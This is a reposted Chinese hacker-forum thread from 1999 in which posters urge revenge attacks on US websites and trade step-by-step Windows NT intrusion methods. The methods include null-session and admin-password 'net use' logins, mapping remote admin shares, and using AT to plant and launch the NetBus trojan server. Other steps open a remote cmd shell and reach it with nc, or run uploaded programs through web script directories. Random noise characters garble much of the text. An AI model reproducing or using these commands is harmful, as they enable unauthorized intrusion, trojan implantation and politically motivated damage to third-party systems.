《版主頁黑客工具和文章的幾個(gè)問題》中提到:2 i6 q6 k% Y7 Y' j+ N9 l- m
請(qǐng)教�,從版主頁上載得PINGER,GRINDER��,LETMEIN等��,卻不能用���,PINGER安裝后�,明明安裝前文件有1M多���,但安裝完后生成的文件夾中只有PINGER。EXE��,40多K�����,運(yùn)行PINGER,設(shè)置好IP�����,點(diǎn)PING�����,彈出一個(gè)窗口(C++�。。�。),說出錯(cuò)�����,然后關(guān)閉了��,何故����,是不是安裝有誤? 2。運(yùn)行LETMEIN����,彈出以下錯(cuò)誤:連接文件LETMEIN。EXE到不存在的NETAPI32���。DLL���;NETGROUPGETUSERS。 是否說明需要NETAPI32�。DLL文件,哪里有該DLL��。 3���。USAKILLER 的教學(xué)文章中提到需在WINNT4���。0下運(yùn)行以下步驟等,是否要求我的操作系統(tǒng)也是WINNT4�。0 ,應(yīng)該不是吧�? 4。NC FOR NT 是否要求我的操作系統(tǒng)為NT����,還是服務(wù)器的操作系統(tǒng)為NT? 太多的問題需高手回答�,我花那么多的時(shí)間和金錢下載這幾M文件卻不能用,實(shí)在窩囊哦���, 強(qiáng)烈建議USAKILLER 等高手級(jí)的黑客寫更多的教學(xué)文章����,以提高我國(guó)黑客水平�。
, [- ]5 V3 p- Q' P' N+ n6 Y> 我的機(jī)子MMX166,WIN98��,2���。5G�,32M內(nèi)存����。5 g, g* P- i' r0 v: [7 P' v# G/ Q
% q( L3 C/ U" t' B$ F7 Y黑客并不神秘,你只要了解操作系統(tǒng)�����,學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn),輔助相關(guān)的工具��,就可以成功����。3 v( s# Y, I0 s2 o
你的問題是,pinger, grinder, letmein等工具必須要在NT上運(yùn)行����,我們強(qiáng)烈建議,你一定要安裝NT��,對(duì)于你的機(jī)器配制��,和我們現(xiàn)在差不多��,只是比你多了32M內(nèi)存�����,2G硬盤�。1 v8 a1 b6 J2 E% o% j* i
其實(shí),攻擊敵站�,利用其操作系統(tǒng)本身的工具就可以了,比如�,我們?cè)贜T上攻擊某服務(wù)器�����,該服務(wù)器為NT4.0���,我們將做如下簡(jiǎn)單事情就有可能成功�����,假設(shè)目標(biāo)NT的IP地址為111.111.111.111����,做法如下:! F" {( H( n. ]+ T1 s
net use \\111.111.111.111\ipc$ "" /user:""
% W& x7 r7 y% |8 @6 h' P, bnet.exe是NT的工具文件,該命令將和目標(biāo)服務(wù)器建立Null Session��,如果成功�,你可以查看該服務(wù)器上的共享目錄:1 p) d' M- K+ m7 \0 K! h
net view \\111.111.111.111
. g1 X" [5 r! B! f- A當(dāng)然,如果你有該NT管理員密碼����,就更好辦了,假設(shè)其管理員Admin密碼為fuck:
. r' L' r. C2 S& x6 E8 p onet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
7 A1 X) h: R# [3 x) E命令成功后��,幾乎所有目標(biāo)NT上的配制����,資源�����,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來查看或修改:
# w- ~ w1 B- n Q1��、查看或修改遠(yuǎn)程機(jī)器上的硬盤�����,假如目標(biāo)NT上有C����、D兩個(gè)硬盤:' }7 K! U/ B5 [2 G
net use x: \\111.111.111.111\c$* v, Y* m4 a( g2 \8 [
net use y: \\111.111.111.111\d$
1 g* z! E' E- Z( ?8 [這樣���,目標(biāo)NT上的C����、D盤分別被影射為你本地的X�����、Y盤��,你想怎么做都可以...
' P8 X- u8 O5 p8 u% w! m5 k# U2、管理目標(biāo)NT的用戶:
; m( ?$ N# z" D5 q8 E從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”. O3 b3 E( g1 M* t& |
鍵入\\111.111.111.111后����,目標(biāo)NT上的所有用戶你想怎么做都可以,和管理你本地的一樣
6 t: F1 P& M5 }" l- f2 M3�、管理目標(biāo)NT的服務(wù)
3 v9 [% l0 @& o, W6 c選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域” w3 t. W: Z2 @6 J. p( L; ?2 G
這樣你可以管理目標(biāo)NT上的服務(wù),共享目錄) X# Q) {( z' A) s( \
4�、IIS管理" O( m9 c8 y) W# l/ j
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.1118 j7 i( ?6 m: H. v. ~" b8 }4 t8 j- F
目標(biāo)NT的FTP、WWW服務(wù)你就可以重新配置2 Z* C3 w' a' ~
5��、事件管理
) Y/ S* \% o: r8 h/ E! V5 I( N“事件查看器”->連接到服務(wù)器->111.111.111.111& S' F0 n6 U/ x: X1 O- o* C3 `
- v: I% w1 J& |
還有更多的東西�,都可以用NT本身的功能來完成����,這些都是95, 98所不能實(shí)現(xiàn)的。
$ w' }0 V% m1 l- h9 m; Q
0 n! w; V! D% h1 [7 `- k" b2 b當(dāng)然��,98,95也能做一些事情�,但很麻煩,比如:
0 s* I3 u( f$ Enet use \\111.111.111.111\ipc$! c$ g* N; N' @
net use z: \\111.111.111.111\d$3 U8 ]" t8 s( t. W! d6 j) W
但其后不能帶參數(shù)����,即改用其他用戶或密碼,系統(tǒng)將用當(dāng)前用戶和密碼去登錄�����,如果你知道目標(biāo)NT的用戶或密碼,重新啟動(dòng)95, 98���,改用該用戶和密碼登錄�����,方可實(shí)現(xiàn)�,你可以連接目標(biāo)NT上的共享資源���,但不能進(jìn)行管理�,如用戶����、事件等. u2 X2 M, L" I2 o
' R k9 W& c4 r. _, z我們強(qiáng)烈建議各位有心要為死難者報(bào)仇,真正的想黑霉國(guó)的站點(diǎn)���,花點(diǎn)時(shí)間����,裝個(gè)NT吧��,NT Workstation也可以!( M2 h) B' { l1 B! `' A
這樣���,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用�����!
2 d% l# k1 L5 X/ O3 P/ M3 Y& Q
) s" r" l' W" l. T3 y+ z" r" {- ^( X8 W# s# V
--------------------------------------------------------------------------------
}- H' b) D+ h" z1 T% Z/ \: y2 A" o& M
>quack于1999-06-12��,23:37:44
8 R" X3 F" w2 m8 g/ s在大作《幾個(gè)有關(guān)黑的問題》中提到:
* \9 _# H+ }) b& j首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時(shí)候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時(shí)亦無此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢到的IP地址若無機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對(duì)了,CIH對(duì)NT暫時(shí)無效,假定上傳其它"有益"美國(guó)NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國(guó)機(jī)子,但運(yùn)行程序時(shí)卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國(guó)鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個(gè)美國(guó)人,哈!��。9 Y# B" P! Q; a6 D) s, D9 V
& u* H7 V- s, w4 |% M! ikillusa于1999-06-13�����,03:25:15
4 S2 k" v3 @$ @* T3 f在大作《Re: 幾個(gè)有關(guān)黑的問題》中提到:* F, B/ V V7 t2 s$ p
' A! X4 j+ _* _ r7 c
letmein.exe 暫時(shí)沒有mypwd參數(shù),十分抱歉& e3 o. ~3 f" M% G
pinger程序�����,只是利用ping來尋找主機(jī)�,每臺(tái)NT服務(wù)器有一個(gè)主IP地址,但也可以設(shè)置多個(gè)輔助IP地址����,比如有些服務(wù)器供應(yīng)商�����,一臺(tái)NT服務(wù)器上可以設(shè)置一千多個(gè)IP�����,每個(gè)IP對(duì)應(yīng)一個(gè)Hostname,而真正能找到主機(jī)名的只有一個(gè)IP地址�,就是該主機(jī)的主IP地址�����,所以有時(shí)顯示只有IP�,而無主機(jī)名。另外����,有些服務(wù)器是非NT的操作系統(tǒng),有時(shí)將不會(huì)顯示主機(jī)名���。當(dāng)然��,有時(shí)在服務(wù)器上進(jìn)行一些設(shè)置���,也會(huì)出現(xiàn)上面的情況�����。* _" U9 |* ^1 q+ h9 u
$ t" V* J ?' R: F8 m+ T1 s3 \
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個(gè)程序���,所以,netbus.exe是不用上傳的��,只需在目的* L2 _& Z; j% [$ C& A( T
服務(wù)器上運(yùn)行ntsrv.exe��,而在目的服務(wù)器運(yùn)行該程序有很多種方法:
5 j# o! P( c" q4 m! L) [; R5 V* q' p4 R
1���、利用服務(wù)器的 Schedule 服務(wù)來啟動(dòng)schedule 服務(wù)是指在服務(wù)器上定時(shí)運(yùn)行某程序��,具體使用方法��,可在自己的NT Dos窗口下鍵入以下:3 E$ {2 J3 |' I1 C. q( m/ R2 M
; H/ K' _5 @* b" Q2 ~& r
C:\>net start schedule
! Y$ L; t- ^* O2 Z) xSchedule 正在啟動(dòng)服務(wù).....8 h3 J9 K$ y2 r- W8 w; |: g
Schedulw 服務(wù)啟動(dòng)成功���。
8 |5 Z+ j* g6 N) HC:\>at /?0 ~1 N! R% z7 X1 q1 x! w& V1 `9 r
AT 命令排定在特定的日期和時(shí)間運(yùn)行某些命令和程序�。
& F$ S, r. Y; U% }" c運(yùn)行 AT 命令之前必須先啟動(dòng) Schedule 服務(wù)。
5 S- O D+ a a6 Y, r7 w' J! ^, q
4 G! O' p5 }$ ?7 r0 RAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
# v3 o9 F% i* B x: N( CAT [\\computername] time [/INTERACTIVE]' A7 D- Z6 L% Q3 z
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"2 n' U+ v7 F" z! x3 @& F
/ p; j0 y3 I8 \& O' f2 c
\\computername 指定遠(yuǎn)程計(jì)算機(jī)��。 如果省略這個(gè)參數(shù). B# V( F9 p" n0 X$ q
命令會(huì)被排定在本機(jī)上運(yùn)行。
7 U0 R% B) k& \2 s9 Wid 指定給排定進(jìn)度命令的識(shí)別號(hào)�。" g# b' K# T3 T+ c$ }0 q5 i {+ k
9 Y# v7 R; u; N/ n1 O/ H6 R# e! K/delete 刪除某個(gè)已排定進(jìn)度的命令。如果省略標(biāo)識(shí)���,計(jì)算機(jī)上所有已排定進(jìn)度的命令都會(huì)被刪除���。
5 _: [; [* i) g( p1 Z/ F7 h8 s/yes 用于刪除所有作業(yè),且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息 ��。% c0 @$ b% @7 N' h& d: E( T
time 指定命令運(yùn)行的時(shí)間����。
$ X9 H9 ?& z& I$ ^1 O+ h, L7 m/interactive 允許作業(yè)在運(yùn)行時(shí),與用戶通過桌面交互��。: D" q1 y0 k' [- p4 D
' I V% f8 F7 \$ C* {4 O) i
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令�����。
0 P" `% q3 x. T, M如果省略日期���,則默認(rèn)為在每月的本日運(yùn)行����。
% G" [- C9 D* h% x, t8 z: P9 B# u9 o) O) d2 n
/next:date[,...] 指定在下一個(gè)指定日期 (如,下周三)�����,運(yùn)行命令��。如果省略日期���,則默認(rèn)為在每月的本日運(yùn)行����。/ z# k1 F$ a! M0 A
0 o* e( n: F) D1 n& U' H
"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件���。( j" [8 N% y* @; h
! S+ J4 g% I( L
C:\>9 m3 _0 H: g8 a' l4 G A0 a3 l
; Y$ @0 t# b# T+ V ~
知道了如何使用AT����,再來看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:1 B+ g# l$ ]6 g/ p6 h" V4 F
1 利用管理員登陸到目的服務(wù)器����,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
9 J1 b2 _+ B$ e, _9 V3 A' x5 ]2 利用ntsrv.exe啟動(dòng)遠(yuǎn)程: netsvc \\x.x.x.x schedule /start, M5 m: z' B" ^! B0 N2 I
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行,當(dāng)然最快運(yùn)行最理想����,所以,你可以用letmein.exe得到服務(wù)器的時(shí)間�����,然后:
/ b( Y) i R& [+ Q* ~' [at \\x.x.x.x 00:00 ntsrv.exe /port:64321/ ], R: H4 p6 e0 w
其中00:00要改為用letmein.exe得回來的具體時(shí)間+一點(diǎn)容量�,等一會(huì)后,再在本地啟動(dòng)netbus.exe����,鍵入目的服務(wù)器得ip地址或hostname,連接��!具體使用可參照 "How to get in nt"�,比如第一種方法,你想要在目的服務(wù)器運(yùn)行 LEGION����,可以利用netbus得上傳功能,將LEGION上傳至目的服務(wù)器�����,再用netbus的"Start program"����,鍵入完整路徑的LEGION運(yùn)行程序����,就ok了�����!第二種方法是利用netbus的“App redirect”功能�����,啟動(dòng)遠(yuǎn)程telnet服務(wù)�,如下:在netbus中擊“App redirect”,鍵入"C:\>winnt\system32\cmd.exe"����,Port為:4321,服務(wù)就啟動(dòng)了�,然后在本地運(yùn)行:nc x.x.x.x 4321,出現(xiàn)dos啟動(dòng)的畫面就表示連接成功: w2 d8 n. u3 S2 b _! t
Microsoft(R) Windows NT(TM)2 ^$ ?0 r8 R7 d' d6 }* c) @
(C) Copyright 1985-1996 Microsoft Corp.7 a/ d! ^ X& u
C:\>6 m* ?( L, t& K9 Y
4 D" u# S/ F6 }' Y2��、利用web啟動(dòng)ntsrv.exe或其他程序在目的服務(wù)器0 H" B/ {: \. e. ^+ E
- s* u8 J- U$ T
將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄�,如cgi-bin或scripts,然后在瀏覽器鍵入url如:0 K- w! U/ @- V
http://x.x.x.x/scripts/ntsrv.exe /port:64321
% F& L' l- J3 i: |) S- p/ E& e( B或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321 v8 h3 U% R/ A5 y3 z
該程序就啟動(dòng)了
- h, t) Q5 z `
" z5 M7 K5 \7 {( Y0 Y. u我只提這幾中方法���! t. s+ B9 w; n& u4 r6 j7 Y) ?: f
要成功��,必須打好基礎(chǔ)工�,對(duì)操作系統(tǒng)充分了解!- {4 u1 y6 V4 ^0 j+ E
# `. N8 d `/ H) S2 g W |
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡